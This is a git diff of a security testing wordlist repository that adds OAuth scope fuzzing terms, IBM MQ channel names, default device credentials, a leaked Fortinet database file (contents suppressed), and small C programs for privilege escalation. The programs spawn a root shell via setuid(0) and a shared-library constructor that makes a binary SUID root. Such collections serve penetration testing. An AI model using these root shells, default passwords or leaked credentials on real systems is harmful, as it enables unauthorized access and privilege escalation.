auto-tmp1xadvoeh-admin
|
|
||||||
auto-tmp1xclfncj-admin
|
|
||||||
auto-tmp1xuraork-admin
|
|
||||||
auto-tmp1xxmqfog-admin
|
|
||||||
auto-tmp1ybutssn-admin
|
|
||||||
auto-tmp1ykaivfj-admin
|
|
||||||
auto-tmp1zckkyea-admin
|
|
||||||
auto-tmp1zmrygef-admin
|
|
||||||
auto-tmp1zwksfza-admin
|
|
||||||
avl
|
avl
|
||||||
avl_id
|
avl_id
|
||||||
base
|
base
|
||||||
@@ -111,11 +102,23 @@ browsepy
|
|||||||
ca-assessments
|
ca-assessments
|
||||||
ca-config
|
ca-config
|
||||||
ca-profiles
|
ca-profiles
|
||||||
|
calls:read
|
||||||
|
calls:write
|
||||||
camunda-rest-api
|
camunda-rest-api
|
||||||
capital2-audience
|
capital2-audience
|
||||||
|
CARE-audience
|
||||||
|
CARE-service-audience
|
||||||
cdsi
|
cdsi
|
||||||
certificate
|
certificate
|
||||||
changeUser
|
changeUser
|
||||||
|
channels:history
|
||||||
|
channels:join
|
||||||
|
channels:manage
|
||||||
|
channels:read
|
||||||
|
channels:write
|
||||||
|
chat:write
|
||||||
|
chat:write:bot
|
||||||
|
chat:write:user
|
||||||
chatbot
|
chatbot
|
||||||
cherry-lumen
|
cherry-lumen
|
||||||
cila-admin
|
cila-admin
|
||||||
@@ -124,11 +127,21 @@ client-role
|
|||||||
client-roles
|
client-roles
|
||||||
client-scope
|
client-scope
|
||||||
client_orchestrator_id
|
client_orchestrator_id
|
||||||
|
ClientConfig
|
||||||
clientmapper
|
clientmapper
|
||||||
|
cloud-platform
|
||||||
coffeeandit
|
coffeeandit
|
||||||
|
CoffeeAndITRole
|
||||||
collection-svc
|
collection-svc
|
||||||
|
company:operations
|
||||||
|
company:support
|
||||||
company_ids
|
company_ids
|
||||||
|
connections:write
|
||||||
|
contacts.read
|
||||||
|
contacts.write
|
||||||
contentApi
|
contentApi
|
||||||
|
conversations.connect:manage
|
||||||
|
conversations.connect:write
|
||||||
cpsadmins-admin
|
cpsadmins-admin
|
||||||
cpsdevelopers-admin
|
cpsdevelopers-admin
|
||||||
cpsotherusers-admin
|
cpsotherusers-admin
|
||||||
@@ -139,27 +152,19 @@ customer-control.itential.io
|
|||||||
data-gateway-api
|
data-gateway-api
|
||||||
default
|
default
|
||||||
delete-after-date1619708000534-admin
|
delete-after-date1619708000534-admin
|
||||||
delete-after-date1619795027961-admin
|
delete:packages
|
||||||
delete-after-date1619795165592-admin
|
delete_repo
|
||||||
delete-after-date1621972703920-admin
|
|
||||||
delete-after-date1621972716128-admin
|
|
||||||
delete-after-date1621972716383-admin
|
|
||||||
delete-after-date1623242123562-admin
|
|
||||||
delete-after-date1623246901890-admin
|
|
||||||
delete-after-date1623593962776-admin
|
|
||||||
delete-after-date1623594025702-admin
|
|
||||||
delete-after-date1623611877516-admin
|
|
||||||
delete-after-date1623666528135-admin
|
|
||||||
delete-after-date1623666553016-admin
|
|
||||||
delete-after-date1623766895485-admin
|
|
||||||
delete-after-date1623767154469-admin
|
|
||||||
delete-after-date1623834887778-admin
|
|
||||||
delete-after-date1623834980049-admin
|
|
||||||
dev-bearer-client
|
dev-bearer-client
|
||||||
device:read
|
device:read
|
||||||
device:write
|
device:write
|
||||||
|
devstorage.full_control
|
||||||
|
devstorage.read_only
|
||||||
|
devstorage.read_write
|
||||||
dexcom
|
dexcom
|
||||||
displayname
|
displayname
|
||||||
|
dnd:read
|
||||||
|
dnd:write
|
||||||
|
dnd:write:user
|
||||||
dns-admin-manager
|
dns-admin-manager
|
||||||
doc-test
|
doc-test
|
||||||
dossiers:checkKBO
|
dossiers:checkKBO
|
||||||
@@ -169,6 +174,7 @@ email
|
|||||||
email2
|
email2
|
||||||
email3
|
email3
|
||||||
email_
|
email_
|
||||||
|
emoji:read
|
||||||
employee
|
employee
|
||||||
erp_api.hayleyhub.uk.all
|
erp_api.hayleyhub.uk.all
|
||||||
erp_credentials
|
erp_credentials
|
||||||
@@ -176,16 +182,24 @@ esp-pact-client-scope
|
|||||||
etherpad
|
etherpad
|
||||||
event:edit
|
event:edit
|
||||||
eventival
|
eventival
|
||||||
|
events.read
|
||||||
evotor
|
evotor
|
||||||
existing-tmp-org-brwswyvm-admin
|
|
||||||
existing-tmp-org-epvxnscj-admin
|
|
||||||
existing-tmp-org-gfvslisk-admin
|
|
||||||
existing-tmp-org-wgthnqmn-admin
|
|
||||||
family_name
|
family_name
|
||||||
farhang-keycloak-proxy
|
farhang-keycloak-proxy
|
||||||
fat-jwt-data
|
fat-jwt-data
|
||||||
federated
|
federated
|
||||||
fhirUser
|
fhirUser
|
||||||
|
file_requests.read
|
||||||
|
file_requests.write
|
||||||
|
files.content.read
|
||||||
|
files.content.write
|
||||||
|
files.metadata.read
|
||||||
|
files.metadata.write
|
||||||
|
files.permanent_delete
|
||||||
|
files.team_metadata.write
|
||||||
|
files:read
|
||||||
|
files:write
|
||||||
|
files:write:user
|
||||||
firstname
|
firstname
|
||||||
fiware-scope
|
fiware-scope
|
||||||
fixture-advancedssoadmin-admin
|
fixture-advancedssoadmin-admin
|
||||||
@@ -196,18 +210,6 @@ fixture-enabled-org-admin
|
|||||||
fixture-existing-organization-admin
|
fixture-existing-organization-admin
|
||||||
fixture-existing-organization2-admin
|
fixture-existing-organization2-admin
|
||||||
fixture-org1-multi-org-user-admin
|
fixture-org1-multi-org-user-admin
|
||||||
fixture-org1ccpginj-admin
|
|
||||||
fixture-org1gbzrgvk-admin
|
|
||||||
fixture-org1ifdqigx-admin
|
|
||||||
fixture-org1jfwjivz-admin
|
|
||||||
fixture-org1lkidlon-admin
|
|
||||||
fixture-org1metnlsp-admin
|
|
||||||
fixture-org1niwxafr-admin
|
|
||||||
fixture-org1oiqyhty-admin
|
|
||||||
fixture-org1xukowuo-admin
|
|
||||||
fixture-org1xvteuwz-admin
|
|
||||||
fixture-org1ymfmoaq-admin
|
|
||||||
fixture-org1yuwikby-admin
|
|
||||||
fixture-org2-multi-org-user-admin
|
fixture-org2-multi-org-user-admin
|
||||||
foobar
|
foobar
|
||||||
forms-tenants
|
forms-tenants
|
||||||
@@ -216,6 +218,8 @@ fred_master_test_client_scope
|
|||||||
fullname
|
fullname
|
||||||
gcp
|
gcp
|
||||||
gcp-partner
|
gcp-partner
|
||||||
|
gist
|
||||||
|
Gitlab
|
||||||
given_name
|
given_name
|
||||||
good-role
|
good-role
|
||||||
good-service
|
good-service
|
||||||
@@ -223,10 +227,17 @@ google
|
|||||||
grafana
|
grafana
|
||||||
group
|
group
|
||||||
group-scope
|
group-scope
|
||||||
|
Groups
|
||||||
groups
|
groups
|
||||||
|
groups.read
|
||||||
|
groups.write
|
||||||
|
groups:history
|
||||||
|
groups:read
|
||||||
|
groups:write
|
||||||
groups_as_list
|
groups_as_list
|
||||||
harbor
|
harbor
|
||||||
haukesprog
|
haukesprog
|
||||||
|
heartrate
|
||||||
hello-service
|
hello-service
|
||||||
home-jenkins
|
home-jenkins
|
||||||
home-users
|
home-users
|
||||||
@@ -237,11 +248,23 @@ iam
|
|||||||
iam-open-broker-api-access
|
iam-open-broker-api-access
|
||||||
id
|
id
|
||||||
id_docs
|
id_docs
|
||||||
|
identity.basic
|
||||||
|
identity.basic:user
|
||||||
|
identity:read:user
|
||||||
|
identity:read:user:user
|
||||||
igneel
|
igneel
|
||||||
|
im:history
|
||||||
|
im:read
|
||||||
|
im:write
|
||||||
|
INBO_Java_Application
|
||||||
indicagro-service
|
indicagro-service
|
||||||
ionic-demo
|
ionic-demo
|
||||||
|
Jaeger-cicd-scope
|
||||||
jaeger-dev-scope
|
jaeger-dev-scope
|
||||||
|
Jenkins-azure
|
||||||
jhipster
|
jhipster
|
||||||
|
Jira
|
||||||
|
Jitsi
|
||||||
jwt_client
|
jwt_client
|
||||||
k8s_dev_resources
|
k8s_dev_resources
|
||||||
k8s_dev_scope
|
k8s_dev_scope
|
||||||
@@ -262,6 +285,9 @@ lastname
|
|||||||
launch
|
launch
|
||||||
launch/patient
|
launch/patient
|
||||||
ldap_dn
|
ldap_dn
|
||||||
|
Linking_accounts
|
||||||
|
links:write
|
||||||
|
location
|
||||||
login
|
login
|
||||||
manage-realm
|
manage-realm
|
||||||
manageUsers
|
manageUsers
|
||||||
@@ -272,9 +298,13 @@ masdata.company.list
|
|||||||
masdata.company.read
|
masdata.company.read
|
||||||
masdata.company.update
|
masdata.company.update
|
||||||
master-api
|
master-api
|
||||||
|
Mattermost
|
||||||
md-buyline
|
md-buyline
|
||||||
medapproved-audience
|
medapproved-audience
|
||||||
mediawiki
|
mediawiki
|
||||||
|
members.delete
|
||||||
|
members.read
|
||||||
|
members.write
|
||||||
membership
|
membership
|
||||||
merchantAccesses
|
merchantAccesses
|
||||||
mesh7-gk-scope
|
mesh7-gk-scope
|
||||||
@@ -288,6 +318,9 @@ ml_app
|
|||||||
mobisis-students
|
mobisis-students
|
||||||
mobisis-teachers
|
mobisis-teachers
|
||||||
moderation
|
moderation
|
||||||
|
mpim:history
|
||||||
|
mpim:read
|
||||||
|
mpim:write
|
||||||
mt2-audience
|
mt2-audience
|
||||||
mt2-ios-audience
|
mt2-ios-audience
|
||||||
mt2-web-ui-audience
|
mt2-web-ui-audience
|
||||||
@@ -297,8 +330,13 @@ nbf
|
|||||||
nbrownMapperService
|
nbrownMapperService
|
||||||
new_client_scope
|
new_client_scope
|
||||||
next-profile
|
next-profile
|
||||||
|
Nextcloud
|
||||||
normalized-openid
|
normalized-openid
|
||||||
notification
|
notification
|
||||||
|
notifications
|
||||||
|
Notificator
|
||||||
|
nutrition
|
||||||
|
OAuth Scope
|
||||||
oauth2_proxy_token
|
oauth2_proxy_token
|
||||||
oauth_client
|
oauth_client
|
||||||
odoo
|
odoo
|
||||||
@@ -314,6 +352,7 @@ oneadvanced-admin
|
|||||||
openid
|
openid
|
||||||
openid_client
|
openid_client
|
||||||
openid_connect
|
openid_connect
|
||||||
|
OpenID_PV_Basic_User_Info
|
||||||
ops-services
|
ops-services
|
||||||
orchestrator.ops.all
|
orchestrator.ops.all
|
||||||
org-tmp1-admin
|
org-tmp1-admin
|
||||||
@@ -371,6 +410,9 @@ phone
|
|||||||
phone2
|
phone2
|
||||||
phone3
|
phone3
|
||||||
phone_
|
phone_
|
||||||
|
pins:read
|
||||||
|
pins:write
|
||||||
|
PITMA
|
||||||
platform-cps-admin
|
platform-cps-admin
|
||||||
platform_audience
|
platform_audience
|
||||||
pnum
|
pnum
|
||||||
@@ -385,114 +427,38 @@ project:edit
|
|||||||
project:read
|
project:read
|
||||||
project:view
|
project:view
|
||||||
provider-portal-prod-audience
|
provider-portal-prod-audience
|
||||||
qa-abd-tuv-fvc-admin
|
PSCUser
|
||||||
qa-aji-oeg-srm-admin
|
public_repo
|
||||||
qa-aws-uyu-osy-admin
|
|
||||||
qa-bbq-bac-epf-admin
|
|
||||||
qa-bsp-gqv-vwb-admin
|
|
||||||
qa-bti-jum-vrl-admin
|
|
||||||
qa-bzu-tww-rfv-admin
|
|
||||||
qa-cbk-qog-pnx-admin
|
|
||||||
qa-czm-szv-ztg-admin
|
|
||||||
qa-dje-cxq-qir-admin
|
|
||||||
qa-dmx-jne-gnp-admin
|
|
||||||
qa-eqa-fgk-btr-admin
|
|
||||||
qa-ets-yln-zph-admin
|
|
||||||
qa-euw-nwd-ydp-admin
|
|
||||||
qa-eyg-chv-fys-admin
|
|
||||||
qa-fai-ynn-cwq-admin
|
|
||||||
qa-fcs-zlk-xmy-admin
|
|
||||||
qa-ffp-sln-qth-admin
|
|
||||||
qa-fgw-cvu-fla-admin
|
|
||||||
qa-fkk-ctw-iqy-admin
|
|
||||||
qa-fxh-jqr-sub-admin
|
|
||||||
qa-gam-vsw-nme-admin
|
|
||||||
qa-ggp-nwt-svq-admin
|
|
||||||
qa-gob-ogh-lzc-admin
|
|
||||||
qa-goc-lxt-zvv-admin
|
|
||||||
qa-gtn-coc-chx-admin
|
|
||||||
qa-gzg-koe-odf-admin
|
|
||||||
qa-hdh-fix-lul-admin
|
|
||||||
qa-hqb-bfl-rca-admin
|
|
||||||
qa-hum-pws-pmt-admin
|
|
||||||
qa-ikp-ttd-mdb-admin
|
|
||||||
qa-iwo-pvs-veh-admin
|
|
||||||
qa-iyi-ifh-kgb-admin
|
|
||||||
qa-iyv-wgo-tam-admin
|
|
||||||
qa-jnw-ejm-exu-admin
|
|
||||||
qa-jwh-lhb-pbt-admin
|
|
||||||
qa-jyi-rcn-jkc-admin
|
|
||||||
qa-kpf-bhe-ntb-admin
|
|
||||||
qa-krp-dqr-jch-admin
|
|
||||||
qa-kuj-xbe-pls-admin
|
|
||||||
qa-lcq-kvo-ara-admin
|
|
||||||
qa-lid-ybx-mfw-admin
|
|
||||||
qa-lix-ann-vxj-admin
|
|
||||||
qa-lro-vvv-shc-admin
|
|
||||||
qa-lvm-mqx-lnl-admin
|
|
||||||
qa-mdl-mnh-ufu-admin
|
|
||||||
qa-mpv-ldl-vxy-admin
|
|
||||||
qa-nbi-jwn-ewp-admin
|
|
||||||
qa-nea-xch-lxd-admin
|
|
||||||
qa-nee-fto-iux-admin
|
|
||||||
qa-nkv-drd-afq-admin
|
|
||||||
qa-nsu-vvu-tei-admin
|
|
||||||
qa-ogs-zdw-bml-admin
|
|
||||||
qa-oql-djg-sdm-admin
|
|
||||||
qa-ouq-odv-zek-admin
|
|
||||||
qa-owz-uxv-usd-admin
|
|
||||||
qa-ozu-bnq-ylj-admin
|
|
||||||
qa-pgh-slw-nav-admin
|
|
||||||
qa-pgr-xvc-brq-admin
|
|
||||||
qa-pkd-gma-mme-admin
|
|
||||||
qa-pny-qeq-itb-admin
|
|
||||||
qa-pzu-cbh-kwd-admin
|
|
||||||
qa-qdo-slj-gas-admin
|
|
||||||
qa-qgh-ldi-bel-admin
|
|
||||||
qa-qjd-hop-zro-admin
|
|
||||||
qa-qxk-sjt-xcd-admin
|
|
||||||
qa-qxs-wku-jcw-admin
|
|
||||||
qa-qzd-zax-juh-admin
|
|
||||||
qa-rdd-yfa-wiy-admin
|
|
||||||
qa-rmr-cwg-eru-admin
|
|
||||||
qa-rmx-wbv-ufm-admin
|
|
||||||
qa-rnz-omt-rvu-admin
|
|
||||||
qa-soz-kkj-auo-admin
|
|
||||||
qa-syc-rys-eat-admin
|
|
||||||
qa-tau-xpm-vel-admin
|
|
||||||
qa-tsf-mlh-tkp-admin
|
|
||||||
qa-tui-cuw-olf-admin
|
|
||||||
qa-tzy-qvw-ccs-admin
|
|
||||||
qa-ugt-kpo-fwu-admin
|
|
||||||
qa-upf-dhf-jfv-admin
|
|
||||||
qa-uro-sxu-hvq-admin
|
|
||||||
qa-vhr-toj-hxj-admin
|
|
||||||
qa-vjg-nxd-ktn-admin
|
|
||||||
qa-vuq-khj-pzo-admin
|
|
||||||
qa-wia-mge-xzk-admin
|
|
||||||
qa-wlu-chd-bna-admin
|
|
||||||
qa-wtm-tcn-rbs-admin
|
|
||||||
qa-xdk-aji-xsc-admin
|
|
||||||
qa-xqk-xlz-xrb-admin
|
|
||||||
qa-yph-wne-vol-admin
|
|
||||||
qa-ysv-iwf-qfj-admin
|
|
||||||
qa-yxh-obr-sxq-admin
|
|
||||||
qa-zfj-kfr-ivv-admin
|
|
||||||
qa-zjt-ecu-gee-admin
|
|
||||||
qa-zox-cia-dzu-admin
|
|
||||||
qa-zox-dpj-pzz-admin
|
|
||||||
qa-zsl-blg-keb-admin
|
|
||||||
qa-zzk-kzk-hht-admin
|
|
||||||
rapier
|
rapier
|
||||||
|
reactions:read
|
||||||
|
reactions:write
|
||||||
read
|
read
|
||||||
|
read:discussion
|
||||||
|
read:org
|
||||||
|
read:packages
|
||||||
|
read:public_key
|
||||||
|
read:repo_hook
|
||||||
|
read:user
|
||||||
realm-management
|
realm-management
|
||||||
realm-management-audience
|
realm-management-audience
|
||||||
registrar
|
registrar
|
||||||
registry
|
registry
|
||||||
|
reminders:read
|
||||||
|
reminders:read:user
|
||||||
|
reminders:write
|
||||||
|
reminders:write:user
|
||||||
|
remote_files:read
|
||||||
|
remote_files:share
|
||||||
|
remote_files:write
|
||||||
|
repo
|
||||||
|
repo:invite
|
||||||
|
repo:status
|
||||||
|
repo_deployment
|
||||||
resource_access.cumulocity.roles
|
resource_access.cumulocity.roles
|
||||||
restheart
|
restheart
|
||||||
rm_client_scope
|
rm_client_scope
|
||||||
role
|
role
|
||||||
|
ROLE_ADMIN
|
||||||
role_list
|
role_list
|
||||||
roles
|
roles
|
||||||
roles_
|
roles_
|
||||||
@@ -502,15 +468,34 @@ sap-adapter-admin
|
|||||||
schedule_zoom_meetings
|
schedule_zoom_meetings
|
||||||
school-person-info
|
school-person-info
|
||||||
scope_minio_mapper
|
scope_minio_mapper
|
||||||
|
ScopeLevel_JWTauthentication_REST_ExternalAuthServer
|
||||||
|
search:read
|
||||||
|
Security
|
||||||
security-admin-console-audience
|
security-admin-console-audience
|
||||||
|
security_events
|
||||||
service
|
service
|
||||||
service-template
|
service-template
|
||||||
|
service.management
|
||||||
services
|
services
|
||||||
|
sessions.list
|
||||||
|
sessions.modify
|
||||||
|
settings
|
||||||
|
sharing.read
|
||||||
|
sharing.write
|
||||||
sjpscope
|
sjpscope
|
||||||
skb_scope
|
skb_scope
|
||||||
|
sleep
|
||||||
slim-jwt-pv-info
|
slim-jwt-pv-info
|
||||||
smart_city_profile
|
smart_city_profile
|
||||||
|
social
|
||||||
|
Sonarqube
|
||||||
|
source.full_control
|
||||||
|
source.read_only
|
||||||
|
source.read_write
|
||||||
|
stars:read
|
||||||
|
stars:write
|
||||||
stone_code
|
stone_code
|
||||||
|
Strapi
|
||||||
students
|
students
|
||||||
studioRGId
|
studioRGId
|
||||||
subscription
|
subscription
|
||||||
@@ -518,6 +503,10 @@ sudoers
|
|||||||
taka-org-ze-hej-c1-o1-admin
|
taka-org-ze-hej-c1-o1-admin
|
||||||
taka-org-ze-hej-c1-o2-admin
|
taka-org-ze-hej-c1-o2-admin
|
||||||
teachers
|
teachers
|
||||||
|
team:read
|
||||||
|
team_data.member
|
||||||
|
team_data.team_space
|
||||||
|
team_info.read
|
||||||
test
|
test
|
||||||
test-admin
|
test-admin
|
||||||
test-resources2-users-admin
|
test-resources2-users-admin
|
||||||
@@ -551,6 +540,7 @@ ti-api-admin-access
|
|||||||
tm-analytics-api-audience
|
tm-analytics-api-audience
|
||||||
tm-analytics-api-service-audience
|
tm-analytics-api-service-audience
|
||||||
tmh-gateway-audience
|
tmh-gateway-audience
|
||||||
|
tokens.basic
|
||||||
transport-scope
|
transport-scope
|
||||||
tsr.admin
|
tsr.admin
|
||||||
tsr.write
|
tsr.write
|
||||||
@@ -562,17 +552,41 @@ urn:kafka:cluster:kafka-cluster:cluster_action
|
|||||||
user
|
user
|
||||||
user.read
|
user.read
|
||||||
user/*.*
|
user/*.*
|
||||||
|
user:email
|
||||||
|
user:follow
|
||||||
|
usergroups:read
|
||||||
|
usergroups:write
|
||||||
|
userinfo.email
|
||||||
|
UserManagement
|
||||||
|
Username
|
||||||
username
|
username
|
||||||
|
users.profile:read
|
||||||
|
users.profile:write
|
||||||
|
users.profile:write:user
|
||||||
|
users:read
|
||||||
|
users:read.email
|
||||||
|
users:write
|
||||||
vehicle:read
|
vehicle:read
|
||||||
vehicle:write
|
vehicle:write
|
||||||
vero-permissions
|
vero-permissions
|
||||||
|
VNR
|
||||||
warehouse_id
|
warehouse_id
|
||||||
web-origins
|
web-origins
|
||||||
web-origins_
|
web-origins_
|
||||||
web-roles_(db-stage)
|
web-roles_(db-stage)
|
||||||
webhook
|
webhook
|
||||||
|
webmasters
|
||||||
|
weight
|
||||||
whoami
|
whoami
|
||||||
wiki-devops
|
wiki-devops
|
||||||
wordpress
|
wordpress
|
||||||
|
workflow.steps:execute
|
||||||
|
WPGroups
|
||||||
|
write:discussion
|
||||||
|
write:gpg_key
|
||||||
|
write:org
|
||||||
|
write:packages
|
||||||
|
write:public_key
|
||||||
|
write:repo_hook
|
||||||
wx_open_id
|
wx_open_id
|
||||||
xwiki_groups
|
xwiki_groups
|
||||||
|
|||||||
12
Fuzzing/IBMMQSeries-channels.txt
Normal file
12
Fuzzing/IBMMQSeries-channels.txt
Normal file
@@ -0,0 +1,12 @@
|
|||||||
|
DEV.ADMIN.SVRCONN
|
||||||
|
DEV.APP.SVRCONN
|
||||||
|
SYSTEM.ADMIN.SVRCONN
|
||||||
|
SYSTEM.AUTO.RECEIVER
|
||||||
|
SYSTEM.AUTO.SVRCONN
|
||||||
|
SYSTEM.DEF.CLUSRCVR
|
||||||
|
SYSTEM.DEF.CLUSSDR
|
||||||
|
SYSTEM.DEF.RECEIVER
|
||||||
|
SYSTEM.DEF.REQUESTER
|
||||||
|
SYSTEM.DEF.SENDER
|
||||||
|
SYSTEM.DEF.SERVER
|
||||||
|
SYSTEM.DEF.SVRCONN
|
||||||
File diff suppressed because it is too large
Load Diff
@@ -5,6 +5,7 @@ POST
|
|||||||
PUT
|
PUT
|
||||||
DELETE
|
DELETE
|
||||||
TRACE
|
TRACE
|
||||||
|
PURGE
|
||||||
CONNECT
|
CONNECT
|
||||||
PROPFIND
|
PROPFIND
|
||||||
PROPPATCH
|
PROPPATCH
|
||||||
|
|||||||
21
Miscellaneous/source-code/c-linux/Makefile
Normal file
21
Miscellaneous/source-code/c-linux/Makefile
Normal file
@@ -0,0 +1,21 @@
|
|||||||
|
# Using x64? $ sudo apt instlal -y libc6-dev-i386
|
||||||
|
|
||||||
|
all: x64 x86
|
||||||
|
|
||||||
|
create:
|
||||||
|
mkdir -p bin/
|
||||||
|
|
||||||
|
x64: create
|
||||||
|
gcc -m64 -static -o bin/root-shellx64 root-shell.c
|
||||||
|
|
||||||
|
x86: create
|
||||||
|
gcc -m32 -static -o bin/root-shellx86 root-shell.c
|
||||||
|
|
||||||
|
strip:
|
||||||
|
strip bin/*
|
||||||
|
|
||||||
|
result:
|
||||||
|
file bin/*
|
||||||
|
|
||||||
|
clean:
|
||||||
|
rm -rf bin/
|
||||||
16
Miscellaneous/source-code/c-linux/drop-shell.c
Normal file
16
Miscellaneous/source-code/c-linux/drop-shell.c
Normal file
@@ -0,0 +1,16 @@
|
|||||||
|
// gcc -fPIC -shared -o drop-shell drop-shell.c
|
||||||
|
#include <stdio.h>
|
||||||
|
#include <sys/types.h>
|
||||||
|
#include <unistd.h>
|
||||||
|
|
||||||
|
// https://gcc.gnu.org/onlinedocs/gcc-4.7.0/gcc/Function-Attributes.html
|
||||||
|
__attribute__((__constructor__))
|
||||||
|
|
||||||
|
void dropshell(void) {
|
||||||
|
// Set root user to be owner, and SUID permission
|
||||||
|
chown("./root-shell", 0, 0);
|
||||||
|
chmod("./root-shell", 04755);
|
||||||
|
|
||||||
|
// Feedback
|
||||||
|
printf("[+] Done!\n");
|
||||||
|
}
|
||||||
12
Miscellaneous/source-code/c-linux/root-shell.c
Normal file
12
Miscellaneous/source-code/c-linux/root-shell.c
Normal file
@@ -0,0 +1,12 @@
|
|||||||
|
// $ gcc -static -o root-shell root-shell.c
|
||||||
|
// $ chmod u+s root-shell
|
||||||
|
|
||||||
|
#include <unistd.h>
|
||||||
|
#include <stdlib.h>
|
||||||
|
|
||||||
|
int main(void) {
|
||||||
|
setuid(0);
|
||||||
|
setgid(0);
|
||||||
|
system("/bin/sh");
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
10
Miscellaneous/source-code/c-linux/root-shell2.c
Normal file
10
Miscellaneous/source-code/c-linux/root-shell2.c
Normal file
@@ -0,0 +1,10 @@
|
|||||||
|
// $ gcc -o root-shell2 root-shell2.c
|
||||||
|
|
||||||
|
#include <unistd.h>
|
||||||
|
|
||||||
|
int main()
|
||||||
|
{
|
||||||
|
setuid(0);
|
||||||
|
execl("/bin/bash", "bash", (char *)NULL);
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
16
Miscellaneous/source-code/c-linux/root-shell3.c
Normal file
16
Miscellaneous/source-code/c-linux/root-shell3.c
Normal file
@@ -0,0 +1,16 @@
|
|||||||
|
// $ gcc -static -o root-shell3 root-shell3.c
|
||||||
|
// $ chmod u+s root-shell3
|
||||||
|
|
||||||
|
#include <unistd.h>
|
||||||
|
#include <stdlib.h>
|
||||||
|
|
||||||
|
int main(void) {
|
||||||
|
setuid(0);
|
||||||
|
setgid(0);
|
||||||
|
seteuid(0);
|
||||||
|
setegid(0);
|
||||||
|
|
||||||
|
execvp("/bin/sh", NULL, NULL);
|
||||||
|
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
2
Miscellaneous/source-code/c-linux/tiny-shell.c
Normal file
2
Miscellaneous/source-code/c-linux/tiny-shell.c
Normal file
@@ -0,0 +1,2 @@
|
|||||||
|
// $ gcc tiny-shell.c
|
||||||
|
int main(void){setresuid(0, 0, 0);system("/bin/sh");}
|
||||||
@@ -890,12 +890,12 @@ F5,admin,admin,
|
|||||||
F5,root,default,
|
F5,root,default,
|
||||||
F5,support,<BLANK>,
|
F5,support,<BLANK>,
|
||||||
F5-Networks,<N/A>,<BLANK>,
|
F5-Networks,<N/A>,<BLANK>,
|
||||||
F5 BIG-IP Configuration utility,admin,admin,https://support.f5.com/csp/article/K13148,
|
F5 BIG-IP Configuration utility,admin,admin,https://support.f5.com/csp/article/K13148
|
||||||
F5 BIG-IP command line,root,default,https://support.f5.com/csp/article/K13148,
|
F5 BIG-IP command line,root,default,https://support.f5.com/csp/article/K13148
|
||||||
F5 BIG-IQ Configuration utility,admin,admin,https://support.f5.com/csp/article/K13148,
|
F5 BIG-IQ Configuration utility,admin,admin,https://support.f5.com/csp/article/K13148
|
||||||
F5 BIG-IQ command line,root,default,,https://support.f5.com/csp/article/K13148,
|
F5 BIG-IQ command line,root,default,https://support.f5.com/csp/article/K13148
|
||||||
F5 FirePass Administrative Console,admin,admin,https://support.f5.com/csp/article/K13148,
|
F5 FirePass Administrative Console,admin,admin,https://support.f5.com/csp/article/K13148
|
||||||
F5 FirePass Maintenance Console,maintenance,<N/A>,https://support.f5.com/csp/article/K13148,
|
F5 FirePass Maintenance Console,maintenance,<N/A>,https://support.f5.com/csp/article/K13148
|
||||||
Fastream Technologies,root,<BLANK>,
|
Fastream Technologies,root,<BLANK>,
|
||||||
Fastwire,fastwire,fw,
|
Fastwire,fastwire,fw,
|
||||||
FatWire,firstsite,firstsite,http://www.vvgr.demon.co.uk/FatWire_Analytics.pdf
|
FatWire,firstsite,firstsite,http://www.vvgr.demon.co.uk/FatWire_Analytics.pdf
|
||||||
@@ -2857,6 +2857,7 @@ xavi,admin,admin,
|
|||||||
xd,xd,xd,
|
xd,xd,xd,
|
||||||
xerox,<N/A>,admin,
|
xerox,<N/A>,admin,
|
||||||
xerox,admin,1111,
|
xerox,admin,1111,
|
||||||
|
zabbix,Admin,zabbix,
|
||||||
zenitel,admin,alphaadmin,https://wiki.zenitel.com/wiki/Password_(IP_Stations)
|
zenitel,admin,alphaadmin,https://wiki.zenitel.com/wiki/Password_(IP_Stations)
|
||||||
zenitel,ADMIN,alphacom,
|
zenitel,ADMIN,alphacom,
|
||||||
zenitel,,1851,
|
zenitel,,1851,
|
||||||
|
|||||||
|
1308
Passwords/Default-Credentials/default-passwords.txt
Normal file
1308
Passwords/Default-Credentials/default-passwords.txt
Normal file
File diff suppressed because it is too large
Load Diff
434924
Passwords/Leaked-Databases/fortinet-2021.txt
Normal file
434924
Passwords/Leaked-Databases/fortinet-2021.txt
Normal file
File diff suppressed because it is too large
Load Diff
16
README.md
16
README.md
@@ -11,6 +11,7 @@ This project is maintained by [Daniel Miessler](https://danielmiessler.com/), [J
|
|||||||
### Install
|
### Install
|
||||||
|
|
||||||
**Zip**
|
**Zip**
|
||||||
|
|
||||||
```
|
```
|
||||||
wget -c https://github.com/danielmiessler/SecLists/archive/master.zip -O SecList.zip \
|
wget -c https://github.com/danielmiessler/SecLists/archive/master.zip -O SecList.zip \
|
||||||
&& unzip SecList.zip \
|
&& unzip SecList.zip \
|
||||||
@@ -18,16 +19,20 @@ wget -c https://github.com/danielmiessler/SecLists/archive/master.zip -O SecList
|
|||||||
```
|
```
|
||||||
|
|
||||||
**Git (Small)**
|
**Git (Small)**
|
||||||
|
|
||||||
```
|
```
|
||||||
git clone --depth 1 https://github.com/danielmiessler/SecLists.git
|
git clone --depth 1 \
|
||||||
|
https://github.com/danielmiessler/SecLists.git
|
||||||
```
|
```
|
||||||
|
|
||||||
**Git (Complete)**
|
**Git (Complete)**
|
||||||
|
|
||||||
```
|
```
|
||||||
git clone https://github.com/danielmiessler/SecLists.git
|
git clone https://github.com/danielmiessler/SecLists.git
|
||||||
```
|
```
|
||||||
|
|
||||||
**Kali Linux** ([Tool Page](https://tools.kali.org/password-attacks/seclists))
|
**Kali Linux** ([Tool Page](https://www.kali.org/tools/seclists/))
|
||||||
|
|
||||||
```
|
```
|
||||||
apt -y install seclists
|
apt -y install seclists
|
||||||
```
|
```
|
||||||
@@ -48,9 +53,10 @@ See [CONTRIBUTING.md](CONTRIBUTING.md)
|
|||||||
|
|
||||||
### Similar Projects
|
### Similar Projects
|
||||||
|
|
||||||
* [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings)
|
- [Assetnote Wordlists](https://wordlists.assetnote.io/)
|
||||||
* [FuzzDB](https://github.com/fuzzdb-project/fuzzdb)
|
- [fuzz.txt](https://github.com/Bo0oM/fuzz.txt)
|
||||||
* [Assetnote Wordlists](https://wordlists.assetnote.io/)
|
- [FuzzDB](https://github.com/fuzzdb-project/fuzzdb)
|
||||||
|
- [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings)
|
||||||
|
|
||||||
- - -
|
- - -
|
||||||
|
|
||||||
|
